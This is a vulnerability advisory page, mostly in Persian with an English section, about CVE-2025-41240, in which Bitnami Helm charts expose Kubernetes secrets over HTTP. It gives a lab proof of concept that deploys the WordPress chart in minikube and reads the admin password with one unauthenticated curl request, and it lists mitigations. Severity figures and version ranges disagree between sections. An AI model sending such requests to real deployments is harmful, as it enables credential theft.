- شناسه CVE-2025-41240 :CVE
- CWE-552 :CWE
- yes :Advisory
- منتشر شده: جولای 24, 2025
- به روز شده: جولای 24, 2025
- امتیاز: 10
- نوع حمله: Unknown
- اثر گذاری: Information Disclosure
- حوزه: سیستمهای مجازیسازی و مدیریت ابری
- برند: VMWare
- محصول: bitnamicharts/appsmith
- وضعیتPublished :CVE
- No :POC
- وضعیت آسیب پذیری: patch شده
چکیده
یک آسیبپذیری بحرانی در سه چارت Bitnami Helm شناسایی شده است. این آسیب پذیری امکان دسترسی غیرمجاز به Kubernetes Secrets را از طریق مسیرهای قابلپیشبینی در root وبسرور فراهم میکند.
توضیحات
این آسیبپذیری باعث میشود Kubernetes Secrets در مسیری قابل پیشبینی بهصورت /opt/bitnami/*/secrets در دایرکتوری root وبسرور قرار گیرد (CWE-552). این مشکل در پیکربندی پیشفرض با مقدار usePasswordFiles=true رخ میدهد که در آن، Secrets بهجای متغیرهای محیطی، بهصورت فایل در فایلسیستم کانتینر نصب (mount) میشود. در صورت در دسترس بودن برنامه از طریق اینترنت، مهاجم میتواند بدون نیاز به احراز هویت یا تعامل با کاربر، با ارسال درخواست به URLهای خاص، به این فایلها دسترسی پیدا کرده و اطلاعات حساس مانند اعتبارنامهها را استخراج کند. این آسیبپذیری تاثیر قابل توجهی بر محرمانگی، یکپارچگی و در دسترسپذیری سیستم داشته و به دلیل پیچیدگی پایین حمله و امکان انجام آن از طریق شبکه, سطح ریسک بسیار بالا ارزیابی شده است. برای کاهش ریسک، بهترین راهکار بهروزرسانی به نسخههای پچشده می باشد.
CVSS
Score | Severity | Version | Vector String |
10.0 | CRITICAL | 3.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
لیست محصولات آسیب پذیر
Versions | Product |
affected from 21.2.0 through 22.0.4 | bitnamicharts/appsmith |
affected from 5.2.0 before 6.0.19 | bitnamicharts/drupal |
affected from 24.2.0 before 25.0.4 | bitnamicharts/wordpress |
لیست محصولات بروز شده
Versions | Product |
22.0.4 | bitnamicharts/appsmith |
6.0.19 | bitnamicharts/drupal |
25.0.4 | bitnamicharts/wordpress |
نتیجه گیری
به کاربران توصیه میشود در اسرع وقت به نسخههای پچشده بهروزرسانی کنند. در صورتی که امکان بهروزرسانی فوری وجود ندارد، بهعنوان راهکار جایگزین میتوان مقدار گزینهی usePasswordFiles را به false تغییر داد یا دسترسی به مسیرهای مربوط به secrets را از طریق پیکربندی وبسرور یا Ingress محدود کرد.
منابع
- https://www.cve.org/CVERecord?id=CVE-2025-41240
- https://www.cvedetails.com/cve/CVE-2025-41240/
- https://github.com/bitnami/charts/security/advisories/GHSA-wgg9-9qgw-529w
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2025-41240
- https://vuldb.com/?id.317483
- https://nvd.nist.gov/vuln/detail/CVE-2025-41240
- https://cwe.mitre.org/data/definitions/552.html
گزارش فنی – اثبات آسیبپذیری Charts (CVE-2025-41240)
- معرفی آسیب پذیری
- شناسه : CVE-2025-41240
- ماهیت مشکل : افشای اطلاعات حساس (Sensitive Information Disclosure)
- شدت آسیبپذیری : بالا (CVSS 7.8)
- سیستمهای آسیبپذیر: استقرارهای Kubernetes که از Bitnami Helm charts استفاده میکنند.
بستههای آسیبپذیر و نسخهها:
- – نسخههای آسیبپذیر bitnamicharts/appsmith (Helm) ≥2.0، نسخههای وصلهشده 22.0.4
- – نسخههای آسیبپذیرbitnamicharts/drupal (Helm) ≥2.0، نسخههای وصلهشده 6.0.19
- – نسخههای آسیبپذیرbitnamicharts/wordpress (Helm) ≥2.0، نسخههای وصلهشده 25.0.4
- محیط آزمایش
برای بازتولید PoC، شرایط زیر توصیه میشود:
- Kubernetes با نصب چارتهای آسیبپذیر Bitnami
- فعال بودن گزینه usePasswordFiles=true در زمان استقرار
- دسترسی به URL سرویس Kubernetes
- اجرای PoC
گام 1: نصب Helm و افزودن مخزن Bitnami
ابتدا Helm را نصب کنید و مخزن Bitnami را اضافه کنید:
wget https://get.helm.sh/helm-v3.17.4-linux-amd64.tar.gz
tar -zxvf helm-v3.17.4-linux-amd64.tar.gz
sudo install linux-amd64/helm /usr/bin
گام 2: اضافه کردن مخزن Bitnami و بروزرسانی آن
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
گام 3: استقرار Kubernetes با استفاده از Helm
برای نصب چارت آسیبپذیر وردپرس، دستور زیر را وارد کنید:
helm install my-wordpress bitnami/wordpress
گام 4: بررسی وضعیت سرویس
پس از نصب چارت، وضعیت سرویس را بررسی کنید:
minikube service my-wordpress
گام 5: تست افشای اطلاعات حساس
با ارسال یک درخواست به نقطه پایانی سرویس، اطلاعات حساس ممکن است افشا شود:
curl http://<IP>:<PORT>/secrets/wordpress-password
گام 6: مشاهده خروجی
در صورت آسیبپذیری، دستور بالا ممکن است رمز عبور وردپرس را به صورت متنی ساده بازگرداند.
- نتیجه مورد انتظار
در یک سیستم امن، رمزهای عبور و اطلاعات حساس نباید از طریق درخواستهای HTTP قابل دسترسی باشند. سیستم باید از اعتبارسنجی صحیح ورودیها برای جلوگیری از افشای این اطلاعات استفاده کند.
- تحلیل فنی
آسیبپذیری CVE-2025-41240 ناشی از عدم اعتبارسنجی صحیح تنظیمات امنیتی در زمان استفاده از Bitnami Helm charts در Kubernetes است. زمانی که گزینه usePasswordFiles=true فعال باشد، اطلاعات حساس مانند رمزهای عبور پایگاه داده از طریق HTTP قابل دسترسی میشوند. این اطلاعات بدون هیچگونه احراز هویتی از طریق URL به مهاجم ارسال میشود و به راحتی قابل استخراج است.
- چارت سوءاستفاده از آسیب پذیری
در شکل زیر چارت چگونگی سوءاستفاده از این آسیب پذیری را می بینید
- رفع مشکل
برای رفع این آسیبپذیری، اقدامات زیر توصیه میشود:
- بروزرسانی چارتهای Helm به نسخههای وصلهشده:
- bitnamicharts/appsmith → 22.0.4 یا جدیدتر
- bitnamicharts/drupal → 6.0.19 یا جدیدتر
- bitnamicharts/wordpress → 25.0.4 یا جدیدتر
- غیرفعال کردن گزینه –set usePasswordFiles=true یا محدود کردن دسترسی به سرویسهای Kubernetes که حاوی اطلاعات حساس هستند.
- استفاده از رمز عبور قوی و احراز هویت صحیح برای دسترسی به این سرویسها.
- محدود کردن دسترسی به سرویسهای Kubernetes به IP های خاص یا از طریق فایروالهای امنیتی.
- منابع
https://charts.bitnami.com/bitnami
https://kubernetes.io/docs/home
https://nvd.nist.gov/vuln/detail/CVE-2025-41240
CVE-2025-41240 – Kubernetes Bitnami Helm Charts Sensitive Information Disclosure
- CVE ID: CVE-2025-41240
- Severity: High (Sensitive Information Disclosure)
- Affected Systems: Kubernetes deployments using vulnerable Bitnami Helm charts
- Affected Packages:
- bitnamicharts/appsmith (Helm) – Affected versions ≥ 21.2.0, Patched versions 22.0.4
- bitnamicharts/drupal (Helm) – Affected versions ≥ 5.2.0, Patched versions 6.0.19
- bitnamicharts/wordpress (Helm) – Affected versions ≥ 24.2.0, Patched versions 25.0.4
- Tested On: Minikube v1.34.0, kubectl v1.32.0, Helm v3.17.4
- References:
Description
A mistake in several Bitnami Helm charts lets sensitive secrets, like application or database passwords, be exposed through HTTP endpoints when you enable the option --set usePasswordFiles=true
.
Attackers who have access to the service URL can obtain plaintext secrets without needing to authenticate.
Prerequisites
- Installed tools: kubectl, minikube, helm
- Test environment with Minikube. Do not test in production without applying patches.
Proof of Concept (PoC)
- Install Helm
wget https://get.helm.sh/helm-v3.17.4-linux-amd64.tar.gz tar -zxvf helm-v3.17.4-linux-amd64.tar.gz sudo install linux-amd64/helm /usr/bin/
- Add Helm repository
bash
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update - Start Minikube
bash
minikube start –force - Install vulnerable WordPress chart
bash
helm install my-wordpress wordpress - Verify service is running
bash
minikube service my-wordpress
Example output:
|———–|————–|————-|—————————|NAMESPACE NAME TARGET PORT URL default my-wordpress http/80 http://192.168.49.2:30279 https/443 http://192.168.49.2:31377 ———– ————– ————- ————————— - Check if secrets are exposed
bash
curl http://192.168.49.2:30279/secrets/wordpress-password
On vulnerable deployments, this leaks the WordPress admin password in plaintext.
— ## Expected Result – Sensitive information, such as WordPress, Drupal, and Appsmith passwords, can be accessed through unauthenticated HTTP requests on weak Helm charts.
— ## Mitigation
- Update Helm charts to the patched versions:
- bitnamicharts/appsmith → 22.0.4 or later – bitnamicharts/drupal → 6.0.19 or later
- bitnamicharts/wordpress → 25.0.4 or later – Avoid using the option –set usePasswordFiles=true unless absolutely necessary.
- Restrict external access to Kubernetes services containing secrets.
— ## Disclaimer This PoC is for educational and research purposes only. Do NOT exploit this vulnerability on systems without clear permission. The author is not responsible for any misuse or damages.